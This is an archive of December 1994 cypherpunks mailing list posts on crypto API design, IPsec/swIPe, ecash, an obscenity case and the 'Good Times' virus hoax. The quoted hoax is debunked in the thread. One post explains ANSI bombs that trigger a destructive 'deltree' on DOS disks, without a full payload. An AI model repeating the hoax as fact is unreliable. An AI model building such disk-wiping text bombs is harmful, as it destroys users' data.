                         uint * oblock_pos, bitstring options);

    resp_t skcs_close (skcs_ctx * ctx, bitstring options);

where:

    typedef struct bucket_str {
        struct bucket_str * next;   /* next bucket in the chain */
        void * data;
        uint type;                  /* a QOS_* or PARAM_* type */
        uint length;
    } bucket;

and qos types could include:

    QOS_KEYSZ_MIN, QOS_KEYSZ_MAX, QOS_KEYSZ_RANGE, QOS_INBLOCKSZ_MIN, ....
param types could include:

    PARAM_KEY, PARAM_IV, PARAM_FEEDBACK_BITS

or something like that. But by the same token, you'd want to ensure that there is something like the following so the additional overhead of chained buckets could be avoided.

    resp_t skcs_set_param (skcs_ctx * ctx, void * data, uint type,
                           uint length);

The point is that the provision of such a `generic' method of specifying attributes lends itself to support a diverse set of algorithms and cryptographic modules. The `skcs_open' could well be a subset of a more generic `crypto_open'. By the same token, there could exist a `skcs_DES_open' and `skcs_IDEA_open' for use when you know the specific algorithm you want and want to avoid additional overheads.

I'm only considering a cryptographic operations interface, not one that deals with more generic `security' operations, such as in GSSAPI. But there are plenty of issues to be examined and resolved.

discuss away!

mg.

--
Matthew Gream (sw/hw engineer) (02) 821-2043

From M.Gream at uts.EDU.AU Tue Dec 6 16:15:47 1994
From: M.Gream at uts.EDU.AU (Matthew Gream)
Date: Tue, 6 Dec 94 16:15:47 PST
Subject: GUCAPI (Grand Unified Crypto API)
In-Reply-To: <199412062348.SAA16082@bb.hks.net>
Message-ID: <199412070014.AA13652@sequoia.itd.uts.EDU.AU>

`"L. Todd Masco"' wrote:

> Ah, I knew of the GSSAPI's existence but hadn't realized that its scope
> included what I wanted. I'll read the draft on the internic and see
> if it does what I want. If so, the next logical step is to wrap RSAREF
> in it and to make a PGPish-wraparound.
>
> I'd certainly be up to the former; Would anybody else be interested in
> ponying up their time and effort for the PGP instance? (The draft
> is ftpable from ftp.internic.net,
> /internet-drafts/draft-ietf-cat-gssv2-00.txt)
>

Ohh, I misinterpreted. You're talking about a high level interface that assumes cryptographic operations are already being used for specific purposes (ie. `signature', `GetMIC', `VerifyMIC', `Wrap', `Unwrap').
I was thinking more about the layer below this, the primitive operations that don't make assumptions on what the user is going to do; and limitations placed thereupon.

ps. In the middle of the year I worked on a Radio Show that delved into the PGP and Clipper debacle, it was titled `Tales from the Crypt'. Subsequently I submitted it for a Government sponsored contest for excellence in technical, science and engineering journalism. I found out yesterday that I've taken out a prize for the best work conducted by someone under the age of 26. There is a certain irony in being awarded the prize by a Government department :-).

--
Matthew Gream (sw/hw engineer) (02) 821-2043

From mpd at netcom.com Tue Dec 6 16:35:38 1994
From: mpd at netcom.com (Mike Duvos)
Date: Tue, 6 Dec 94 16:35:38 PST
Subject: AABBS Conviction relation to child porn?
In-Reply-To: <0098881E.4950521B.51@INS.INFONET.NET>
Message-ID: <199412070035.QAA18461@netcom13.netcom.com>

ED KELLY writes:

> There is hoopla over the convictions of those who ran the
> Amateur Action BBS. The actual charges involve stuff that
> sounded like it was intended to be distributed as child
> pornography. The indictment described the offensive material
> being distributed as follows in each count:

I think you have your wires crossed here. There was no claim made that the models were underage in any of the erotica you cite. The material was deemed to be obscene because it depicted things such as incest, bestiality, foreign object insertion, piercing, and other non-mainstream sexual themes. Everyone was over 18 in all the pictures you mention, and the only material on the BBS which depicted children was legal nudist material scanned from reputable sources.
Since the original complaint from the "outraged citizen" which prompted the investigation and subsequent entrapment was about nudist GIFs, which were perfectly legal, one might argue that the obscenity charges were just an indirect way to nail AA for daring to have nude kid pix available on their BBS. Certainly there are plenty of places in Tennessee where "specialty" erotica can be purchased which are not being prosecuted with similar zeal.

--
Mike Duvos $ PGP 2.6 Public Key available $
mpd at netcom.com $ via Finger. $

From alex at omaha.com Tue Dec 6 16:43:46 1994
From: alex at omaha.com (Alex Strasheim)
Date: Tue, 6 Dec 94 16:43:46 PST
Subject: swIPe
Message-ID: <199412070044.SAA00308@omaha.omaha.com>

-----BEGIN PGP SIGNED MESSAGE-----

Has anything been happening with swIPe lately? I seem to remember reading
a couple of months ago that the protocol was being revised (simplified?)
and that a new RFC was going to be released soon. What's the status of
the project now?

==
Alex Strasheim | finger astrashe at nyx.cs.du.edu
alex at omaha.com | for my PGP 2.6.1. public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From pfinerty at seattleu.edu Tue Dec 6 16:50:16 1994
From: pfinerty at seattleu.edu (being)
Date: Tue, 6 Dec 94 16:50:16 PST
Subject: Announcing - The DigitaLiberty Forum
In-Reply-To: <9412062258.AA23412@dockmaster.phantom.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> *** Who can join DigitaLiberty?
>
> The DigitaLiberty Forum is open to anyone that can honestly answer yes to the
> following two questions:
>
> 1) I renounce the use of coercive force as a tool of social or economic
> policy.

well, i guess i can't join!
as a grad student all of you pay me (or my advisor i should say) to learn how to cure all of this world's awful diseases...right.

I cannot fathom people who seem to insist on taking their doses of reality rectally.

5150
pfinerty at bach.seattleu.edu
finerty at msscc.med.utah.edu finger any acct. for pgp key
pfinerty at nyx10.cs.du.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From jya at pipeline.com Tue Dec 6 17:24:18 1994
From: jya at pipeline.com (John Young)
Date: Tue, 6 Dec 94 17:24:18 PST
Subject: NYT on N2 and Star Wars
Message-ID: <199412070123.UAA18255@pipe3.pipeline.com>

Some cries of no-gets of N2_duh and RAY_dem. N=N lobbed by 8 PM EST. No get, retry. Frantic PBM sez excuse this msg.

From cactus at seabsd.hks.net Tue Dec 6 18:38:40 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Tue, 6 Dec 94 18:38:40 PST
Subject: GUCAPI (Grand Unified Crypto API)
Message-ID: <199412070243.VAA17789@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412070014.AA13652 at sequoia.itd.uts.EDU.AU>, Matthew Gream wrote:

>Ohh, I misinterpreted. You're talking about a high level interface that
>assumes cryptographic operations are already being used for specific
>purposes (ie. `signature', `GetMIC', `VerifyMIC', `Wrap', `Unwrap').
>
>I was thinking more about the layer below this, the primitive operations
>that don't make assumptions on what the user is going to do; and
>limitations placed thereupon.

Actually, both interfaces are reasonable for the scope of this discussion. I don't have specific goals in mind yet: I want to bounce around ideas before coming up with something more specific.

The GSSAPI has the advantage that Kerberos services have already been provided for that API: There's no reason, however, that the two goals need to be mutually exclusive.
I'll have to read the GSSAPI doc carefully and get a sense of what problems it solves.

>I found
>out yesterday that I've taken out a prize for the best work conducted
>by someone under the age of 26. There is a certain irony in being
>awarded the prize by a Government department :-).

Nevertheless, congratulations!

- --
Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com | neither more nor less.'" - Lewis Carroll

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From perry at imsi.com Tue Dec 6 18:53:53 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 6 Dec 94 18:53:53 PST
Subject: Dec. 10th Bay Area Cypherpunks Meeting
In-Reply-To: <9412070836.ZM4161@wiley.sydney.sgi.com>
Message-ID: <9412070253.AA07672@snark.imsi.com>

Aren't there multicast provisions at SGI? Eric?

.pm

"Ian Farquhar" says:

> On Dec 5, 10:28pm, KT Kislitzin wrote:
> > This month's Bay Area Cypherpunks Meeting will be held this Saturday,
> > December 10th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris
> > (same cypher time, same cypher channel...).
> >
> > The topic for this month's discussions is:
> >
> > Technical Cryptography
> >
> > We have three speakers planned.
> > [...]
>
> There isn't a chance that this could either be taped or broadcast, is there?
> This sounds like it will be a fascinating meeting, and deserves a wider
> audience.
>
> Ian.
>

From perry at imsi.com Tue Dec 6 18:59:16 1994
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 6 Dec 94 18:59:16 PST
Subject: swIPe
In-Reply-To: <199412070044.SAA00308@omaha.omaha.com>
Message-ID: <9412070257.AA07680@snark.imsi.com>

Alex Strasheim says:

> Has anything been happening with swIPe lately? I seem to remember reading
> a couple of months ago that the protocol was being revised (simplified?)
> and that a new RFC was going to be released soon. What's the status of
> the project now?

Asking this *during* the IETF meeting is bad timing. Ask the question again in a week...

.pm

From mab at crypto.com Tue Dec 6 19:12:24 1994
From: mab at crypto.com (Matt Blaze)
Date: Tue, 6 Dec 94 19:12:24 PST
Subject: swIPe
In-Reply-To: <199412070044.SAA00308@omaha.omaha.com>
Message-ID: <199412070313.WAA24449@crypto.com>

>-----BEGIN PGP SIGNED MESSAGE-----
>
>Has anything been happening with swIPe lately? I seem to remember reading
>a couple of months ago that the protocol was being revised (simplified?)
>and that a new RFC was going to be released soon. What's the status of
>the project now?
>
>==
>Alex Strasheim | finger astrashe at nyx.cs.du.edu
>alex at omaha.com | for my PGP 2.6.1. public key
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>-----END PGP SIGNATURE-----

Well, if by swIPe you mean the standards-track IP security protocol, quite a bit. I'm not going to the next IETF meeting (perry?, phil?) but I understand that swIPe and friends have mutated into something that is very close to becoming an RFC.

Key management is another story, with no general agreement as to what the requirements even are.

My own feeling is that more experience is needed with network-layer security in general before the problems and tradeoffs of key management in heterogeneous networks will emerge with any clarity.
If you mean swIPe, the protocol described in Ioannidis and Blaze's draft RFC of last December, not much. There's an implementation floating around (I think on the ucb ftp server), but I don't know of anyone who's actively deploying it outside of closed systems.

Now would be a very good time to play with this stuff, particularly with an eye toward understanding what the key management requirements are. Right now the future internet cryptographic security architecture is wide open, but that window is starting to close.

-matt

From ianf at sydney.sgi.com Tue Dec 6 19:37:18 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 6 Dec 94 19:37:18 PST
Subject: Dec. 10th Bay Area Cypherpunks Meeting
In-Reply-To: <9412070253.AA07672@snark.imsi.com>
Message-ID: <9412071428.ZM14244@wiley.sydney.sgi.com>

On Dec 6, 9:53pm, Perry E. Metzger wrote:

> Aren't there multicast provisions at SGI? Eric?

Yes, although many of us are at the end of links too slow to even get reliable audio, let alone video.

Ian.

From pstemari at fsp.fsp.com Tue Dec 6 19:48:55 1994
From: pstemari at fsp.fsp.com (Paul Ste. Marie)
Date: Tue, 6 Dec 94 19:48:55 PST
Subject: backing ecash
In-Reply-To: <199412050431.WAA00176@omaha.omaha.com>
Message-ID: <9412070347.AA11423@fsp.fsp.com>

> Now obviously, things would work a lot more smoothly if you didn't need me
> or my digital currency exchange. It would be nice if Bob and Alice could
> buy and sell edollars from their banks online. But it's not essential. I

Isn't there a problem with net-based distribution of ecash? It would seem that Eve could intercept the ecash and spend it first. Encrypted email return of the ecash would seem to violate the anonymity of the ecash. Some sort of one-time encrypted return address would seem to be necessary, but better yet would be a vending machine that took a floppy disk and some currency and stuck the ecash on the floppy.
Paul

From jrochkin at cs.oberlin.edu Tue Dec 6 20:17:13 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Tue, 6 Dec 94 20:17:13 PST
Subject: backing ecash
Message-ID:

At 10:47 PM 12/06/94, Paul Ste. Marie wrote:

>Isn't there a problem with net-based distribution of ecash? It would
>seem that Eve could intercept the ecash and spend it first. Encrypted
>email return of the ecash would seem to violate the anonymity of the
>ecash. Some sort of one-time encrypted return address would seem to
>be necessary, but better yet would be a vending machine that took a
>floppy disk and some currency and stuck the ecash on the floppy.

Diffie-Hellman would seem appropriate here. Look it up in Schneier.

Vending machines seem a good idea too, but one unlikely to develop any time soon. Or possibly ever, if the net becomes so prevalent that no one would think of doing anything offline that could just as well be done online.

From jya at pipeline.com Tue Dec 6 20:42:45 1994
From: jya at pipeline.com (John Young)
Date: Tue, 6 Dec 94 20:42:45 PST
Subject: (Fwd) Read this, Virus info!!
Message-ID: <199412070447.XAA18944@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

I have received two versions of this warning about "Good Times" virus, this one from mail list Design-L and a similar one from list Fiction-of-Philosophy. Some forwarded headers have been removed from this version.

Has anyone on c'punks got further info or comment?

John

PGP 262 Key ID 34EE1095

- -------------------
Forwarding Design-L mail by: WAYDE at UTKVX.UTCC.UTK.EDU (Wayde Justin Tardif) on
- -------------------
From: IN%"ripp0009 at frank.mtsu.edu" "Matthew D. Hamilton" 6-DEC-1994 22:42:53.89
To: IN%"xbuj17a at prodigy.com", IN%"agratz at aol.com", IN%"wayde at utkvx.utk.edu", IN%"hbaldry at utkvx.utk.edu"
CC:
Subj: Read this A.S.A.P.-- VIRUS (fwd)

[Multiple headers elided]
- -------------------

* WARNING *

There is a virus being sent on Online America by E-mail.
If you get anything called "Good Times", DO NOT READ IT OR DOWNLOAD IT. I repeat, do not read it or download it. It is a virus that will erase your hard drive. Please forward this message to everyone you have an address for. It will help them a lot.

*****************************************************************
"We're going to play for you now a little Oriental song. It's called Tu Ning"
*****************************************************************
Raenna
infinit at umich.edu

- ------------------- End Forward

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From pstemari at fsp.fsp.com Tue Dec 6 20:54:41 1994
From: pstemari at fsp.fsp.com (Paul Ste. Marie)
Date: Tue, 6 Dec 94 20:54:41 PST
Subject: GUCAPI (Grand Unified Crypto API)
In-Reply-To: <9412062142.AA08621@homer.spry.com>
Message-ID: <9412070454.AA12355@fsp.fsp.com>

> I would be interested in seeing something like this implemented, but I
> question whether it will be a hit as an industry standard. Generic API's
> really haven't gone over well for things in the past. (Except the class
> libraries for major C++ compilers. MFC, OWL, etc.)
> The design has to be robust before you start coding.

Something like this should be fairly reasonable to implement in C++. The basic concept would be to have a single public abstract class with a static method that takes a protocol name and returns a pointer to an encryption engine object that implements that protocol. The actual classes could either register themselves with the base class statically at link time or dynamically via DLL's or equivalent and an OS dependent config utility.
The biggest question to my mind is how to handle key management and whether the engines should require blocks of an appropriate size (eg encrypt(size_t blksize, const char *inbuf, char *outbuf)) or act as pumps with user-specified data sources and sinks (eg encrypt(istream& input, ostream& output)).

Paul

From msanders at ataxia.res.wpi.edu Tue Dec 6 20:55:39 1994
From: msanders at ataxia.res.wpi.edu (Michael K. Sanders)
Date: Tue, 6 Dec 94 20:55:39 PST
Subject: (Fwd) Read this, Virus info!!
In-Reply-To: <199412070447.XAA18944@bb.hks.net>
Message-ID: <199412070503.AAA01081@ataxia.res.wpi.edu>

-----BEGIN PGP SIGNED MESSAGE-----

In the beginning there was nothing. Then John Young said:

>-----BEGIN PGP SIGNED MESSAGE-----
>I have received two versions of this warning about "Good Times"
>virus, this one from mail list Design-L and a similar one from
>list Fiction-of-Philosophy. Some forwarded headers have been
>removed from this version.
>Has anyone on c'punks got further info or comment?

Yeah, I'm getting really fucking sick of it. This is about the dozenth copy of this silly thing I've received from various sources. As far as I'm concerned, the only 'virus' we have to worry about is the unrelenting propagation of that damn message.

Has anyone actually seen this 'Good Times' thing? I highly doubt it. And seriously, an e-mail virus? Get real.

- --
Michael K. Sanders -- msanders at ataxia.res.wpi.edu
ataxia: NetBSD/Amiga 1.0 - Creating Chaos out of Anarchy for a Better Tomorrow
Ataxia Home Page

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From ianf at sydney.sgi.com Tue Dec 6 21:22:44 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 6 Dec 94 21:22:44 PST
Subject: Read this, Virus info!!
In-Reply-To: <199412070447.XAA18944@bb.hks.net>
Message-ID: <9412071610.ZM10826@wiley.sydney.sgi.com>

On Dec 6, 11:47pm, John Young wrote:

> * WARNING *
>
> There is a virus being sent on Online America by E-mail. If
> you get anything called "Good Times", DO NOT READ IT OR
> DOWNLOAD IT. I repeat, do not read it or download it. It is
> a virus that will erase your hard drive. Please forward this
> message to everyone you have an address for. It will help
> them a lot.

And pigs fly too.

Ian.

From perry at imsi.com Tue Dec 6 21:52:30 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 6 Dec 94 21:52:30 PST
Subject: swIPe
In-Reply-To: <199412070313.WAA24449@crypto.com>
Message-ID: <9412070551.AA07757@snark.imsi.com>

Matt Blaze says:

> Well, if by swIPe you mean the standards-track IP security protocol,
> quite a bit. I'm not going to the next IETF meeting (perry?, phil?)
> but I understand that swIPe and friends have mutated into something
> that is very close to becoming an RFC.

True.

> Key management is another story, with no general agreement as to
> what the requirements even are.

Less true; there are multiple proposals, but none of them meet my internal standards on what is needed :-)

> My own feeling is that more experience is needed with network-layer
> security in general before the problems and tradeoffs of key management
> in heterogeneous networks will emerge with any clarity.

I would partially agree. We do have some actual real world experience with one key management and authentication system -- Kerberos. It's not sufficient, but it does provide a lot of interesting lessons. In particular, it has a distinct advantage over most of the currently proposed key management systems in the IETF: it is actually possible to write secure applications with Kerberos. (This is not as bad as it sounds; there are still ways to use the proposed key management systems (for setting up encrypted tunnels as an example) but these uses are more limited.)
> If you mean swIPe, the protocol described in Ioannidis and Blaze's
> draft RFC of last December, not much. There's an implementation
> floating around (I think on the ucb ftp server), but I don't know
> of anyone who's actively deploying it outside of closed systems.

Actually, swIPe the implementation has been ported to three systems (largely berkeley clones) and is being actively sold as part of the TIS firewall product. However, its future with its current packet format is obviously limited. swIPe the packet format is quite dead, but swIPe the implementation will probably be hacked to support the IPSP protocol, whatever it ends up being in the end.

> Now would be a very good time to play with this stuff, particularly with
> an eye toward understanding what the key management requirements are.
> Right now the future internet cryptographic security architecture is wide
> open, but that window is starting to close.

Quite true.

Perry

From GERSTEIN at SCSUD.CTSTATEU.EDU Tue Dec 6 22:03:52 1994
From: GERSTEIN at SCSUD.CTSTATEU.EDU (ADAM GERSTEIN, _THE_ MACGURU)
Date: Tue, 6 Dec 94 22:03:52 PST
Subject: Good times virus thing-a-ma-bobber
Message-ID: <941207010448.20216805@SCSUD.CTSTATEU.EDU>

Michael K. Sanders is believed to have said:

>Has anyone actually seen this 'Good Times' thing? I highly doubt
>it. And seriously, an e-mail virus? Get real.

Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean anything to you? Sure, it wasn't actual email, but it did use email and other means of transport to cripple the net in a matter of hours.

adam

-=-=-=-
Adam J.
Gerstein
MacGuru to the stars
Available at:
GERSTEIN at SCSU.CTSTATEU.EDU
MACGEEK at SCSU.CTSTATEU.EDU
A GERSTEIN at AOL.COM
MACGEEK at eWorld.com
an41389 at anon.penet.fi (for anonymity)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From perry at imsi.com Tue Dec 6 22:10:41 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 6 Dec 94 22:10:41 PST
Subject: Good times virus thing-a-ma-bobber
In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU>
Message-ID: <9412070610.AA07800@snark.imsi.com>

"ADAM GERSTEIN, _THE_ MACGURU" says:

> Need I remind you of a certain Robert T. Morris? Does the "Internet
> Worm" mean anything to you? Sure, it wasn't actual email, but it did
> use email and other means of transport to cripple the net in a
> matter of hours.

The similarity between the Morris worm and a "if you read it your computer will get cooties" virus is comparable to the distinction between an actual war and the film version of "Star Wars".

.pm

From msanders at ataxia.res.wpi.edu Tue Dec 6 22:24:05 1994
From: msanders at ataxia.res.wpi.edu (Michael K. Sanders)
Date: Tue, 6 Dec 94 22:24:05 PST
Subject: Good times virus thing-a-ma-bobber
In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU>
Message-ID: <199412070630.BAA02067@ataxia.res.wpi.edu>

-----BEGIN PGP SIGNED MESSAGE-----

In the beginning there was nothing. Then ADAM GERSTEIN, _THE_ MACGURU said:

>Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean
>anything to you? Sure, it wasn't actual email, but it did use email and other
>means of transport to cripple the net in a matter of hours.

No, you don't, and yes, it does. But I hardly see the similarity.
As you say, Morris' worm brought the net to its knees in a matter of hours, yet no _reliable_ source has even mentioned this supposed "Good Times" virus, let alone *seen* it. The message itself reeks of the typical chain letter-- oh please send this to absolutely everyone you know with email! It'll help them lots! Yeah, whatever.

- --
Michael K. Sanders -- msanders at ataxia.res.wpi.edu
ataxia: NetBSD/Amiga 1.0 - Creating Chaos out of Anarchy for a Better Tomorrow
Ataxia Home Page

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From claborne at microcosm.sandiegoca.NCR.COM Tue Dec 6 22:31:24 1994
From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris)
Date: Tue, 6 Dec 94 22:31:24 PST
Subject:
Message-ID: <2EE554E4@microcosm.SanDiegoCA.NCR.COM>

One of the reasons that Phil and Ralph get anything done is because they aren't subscribed to this list. Over 300 messages a week and growing.... How about cutting the flames, the Detweiler/DM junk, HEAT postings and post substantive info, questions, or discussion.

2
-- C --

----------
>From: Anonymous User
>--------------------------------------------------------------------------- ---
>I don't know what is going on here. This list seems to have
>bogged down in meta-issues. I am very disappointed with
>Eric Hughes' recent display of feather-fluffing. He seems
>to fail to understand that the list has absolutely NOTHING
>to do with him personally. The full subscriber base could
>MOVE IMMEDIATELY if so inclined, and indeed the atmosphere
>seems to be getting a bit oppressive here.
>
>I hate to say this but it reminds me of when all the Detweiler
>flames were erupting a long time ago.
Detweiler seemed to
>be especially enraged with the way that E.Hughes ran the list
>in a dictatorial, "iron fist" way. He failed to understand
>that his own role was merely that of a janitor, not a
>celebrity with a personality cult. Is that all the cypherpunks
>list is about? I tell you that this idea that "cypherpunks
>code" does not mean anything. "cypherpunks talk about code
>endlessly" but when it comes down to it, this whole list
>is nothing but a lot of people STROKING EACH OTHER'S EGOS
>while the outsiders (Phil Zimmermann, Ralph Levien) are the
>only ones getting anything done!!
>
>

From nobody at c2.org Tue Dec 6 22:52:43 1994
From: nobody at c2.org (nobody at c2.org)
Date: Tue, 6 Dec 94 22:52:43 PST
Subject: good times
Message-ID: <199412070650.WAA05487@infinity.c2.org>

fnord

-23

From jcorgan at netcom.com Tue Dec 6 22:58:15 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Tue, 6 Dec 94 22:58:15 PST
Subject: Ideal digital cash system?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On page 123 of Applied Cryptography Bruce Schneier cites the work of two cryptographers and the digital cash system they invented that satisfies all six properties he listed on the same page. In his words:

The authors consider this the first ideal untraceable electronic cash system.

The reference [674] is:

T. Okamoto and K. Ohta, Universal Electronic Cash
Advances in Cryptology--CRYPTO '91 Proceedings
Berlin: Springer-Verlag 1992 pp. 324-337

Is anyone here familiar with this work? Has anyone tried to implement this protocol in some manner? Also how would I go about obtaining the text of this work either in written form or online?
=======================================================================
Johnathan Corgan "Violence is the last refuge of the incompetent"
jcorgan at netcom.com -Isaac Asimov
PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan
=======================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Tue Dec 6 23:00:32 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Tue, 6 Dec 94 23:00:32 PST
Subject: "Virus Alert" chain letter
Message-ID: <199412070700.CAA10366@ducie.cs.umass.edu>

-----BEGIN PGP SIGNED MESSAGE-----

Dear AOL Postmaster:

The message below has apparently been circulating quite widely. Personally I doubt the authenticity of the claim, and strongly suspect that it's just an annoying attempt to create a chain letter. In any event, it would be handy to hear some sort of statement from AOL about this matter to stem the tide of largely unproductive speculation on various mailing lists. I'm cc:ing this to the cypherpunks list , and encourage you to cc: your reply to the list. I recommend posting some sort of announcement to the comp.virus newsgroup as well.

Thanks very much for your time.

- -L. McCarthy

Forwarded message:

> Subj: Read this A.S.A.P.-- VIRUS (fwd)
>
> * WARNING *
>
> There is a virus being sent on Online America by E-mail. If
> you get anything called "Good Times", DO NOT READ IT OR
> DOWNLOAD IT. I repeat, do not read it or download it. It is
> a virus that will erase your hard drive. Please forward this
> message to everyone you have an address for. It will help
> them a lot.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From ianf at sydney.sgi.com Tue Dec 6 23:08:02 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 6 Dec 94 23:08:02 PST
Subject: Good times virus thing-a-ma-bobber
In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU>
Message-ID: <9412071802.ZM15418@wiley.sydney.sgi.com>

On Dec 7, 1:04am, ADAM GERSTEIN, _THE_ MACGURU wrote:

> Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean
> anything to you? Sure, it wasn't actual email, but it did use email and other
> means of transport to cripple the net in a matter of hours.

The Internet Worm used the sendmail DEBUG mode to execute commands on a remote system. It did not propagate itself via email messages, which was what the original (ridiculous) warning claimed.

I can't feel a lot of sympathy for people who took this announcement seriously. Such stupidity reaps its own rewards.

Ian.

From suter at crl.com Tue Dec 6 23:22:46 1994
From: suter at crl.com (Edgar A. Suter)
Date: Tue, 6 Dec 94 23:22:46 PST
Subject: Announcing - The DigitaLiberty Forum
In-Reply-To: <9412062258.AA23412@dockmaster.phantom.com>
Message-ID:

I am certain that the nattering nabobs of negativism would take issue with the mainstream miasma of majoritarianism.

*************************************************************************
* Edgar A. Suter, MD suter at crl.com *
* Chair, DIRPP Doctors for Integrity in Research & Public Policy *
*************************************************************************

From adam.philipp at ties.org Tue Dec 6 23:37:21 1994
From: adam.philipp at ties.org (Adam Philipp)
Date: Tue, 6 Dec 94 23:37:21 PST
Subject: Good times virus (ANSI BOMB?)
Message-ID: <199412070742.CAA21434@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

>On Dec 7, 1:04am, ADAM GERSTEIN, _THE_ MACGURU wrote:
>> Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean
>> anything to you? Sure, it wasn't actual email, but it did use email and other
>> means of transport to cripple the net in a matter of hours.
>
>The Internet Worm used the sendmail DEBUG mode to execute commands on
>a remote system. It did not propagate itself via email messages, which was
>what the original (ridiculous) warning claimed.
>
>I can't feel a lot of sympathy for people who took this announcement
>seriously. Such stupidity reaps its own rewards.

Although the concept of "text viruses" seems a bit far fetched to some people, there are these lovely toys known as ANSI bombs. Essentially they work in a similar method to some techniques used in the sendmail bug, but they are MS-DOS specific, they will use embedded ANSI codes to run programs as the file is viewed... anyone know what will happen if deltree /XXX (where XXX represents an unpublished string of characters) is run from the root directory of a DOS hard disk? It's gone, quickly. Sure the files can be undeleted, but undeleting a whole disk is tricky business...

Maybe Good Times is a hoax, but ANSI bombs exist and using a DOS ANSI text viewer will surely be a foolish thing to do on any downloaded text file...

If anyone feels the need for proof I collected a few a while back, but really don't see the need to post them...heh heh.

Adam Philipp

PS: Please no comments about superiority of MACs or LINUX boxes because they are immune to ANSI bombs...that ought to be clear enough...

- --
PGP Key available on the keyservers. Encrypted E-mail welcome.
SUB ROSA: Confidential, secret, not for publication. -Black's Law Dictionary
GJ/CS d H S:+ g? p?
au+ a- w+ v++ c++ UL+ UU+ US+ P+ 3 E N++ k- W++ M-- V po- Y++ t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u** h-- f++ r+ n+ y++--

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From anonymous-remailer at xs4all.nl Wed Dec 7 00:08:11 1994
From: anonymous-remailer at xs4all.nl (Name withheld on request)
Date: Wed, 7 Dec 94 00:08:11 PST
Subject: PGPTools bug
Message-ID: <199412070809.AA01450@xs1.xs4all.nl>

-----BEGIN PGP SIGNED MESSAGE-----

This is a known problem in old versions, caused by this bug in fifo_destroy.

    while(fb) {
        nfb=fb;
        fifo_block_unlink(fb); /* Free the block */
        fb=nfb->next; /* And then read it...oops */
    }

It's fixed like this in later versions.

    while(fb) {
        nfb=fb->next;
        fifo_block_unlink(fb);
        fb=nfb;
    }

Get the latest version (10d I think) from ftp.csn.net, and download a file called pgptlupd.zip. The update has the fixed fifo, among other things. Don't use the earlier versions. They have bugs. Get my latest release, not one that has been hacked by someone else.

Pr0duct Cypher

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From skaplin at skypoint.com Wed Dec 7 00:25:12 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Wed, 7 Dec 94 00:25:12 PST
Subject: Anybody got a procmail recipe?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Does anyone have a procmail recipe which will forward all incoming mail messages to a shell account to a specific usenet news group?
Thanks,

Sam

==============================================================================
Liberty doesn't work as well in practice as it does in speeches.
                                                             --Will Rogers--
==============================================================================
skaplin at skypoint.com                   | "...vidi vici veni" - Overheard
                                         | outside a Roman brothel.
PGP encrypted mail is accepted and       |
preferred.                               | Change is the only constant in the
                                         | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or  |
Finger skaplin at mirage.skypoint.com    | Smile!! Big brother is watching.
==============================================================================

This message digitally signed to verify the identity of the writer.

From lmccarth at ducie.cs.umass.edu Wed Dec 7 00:45:32 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
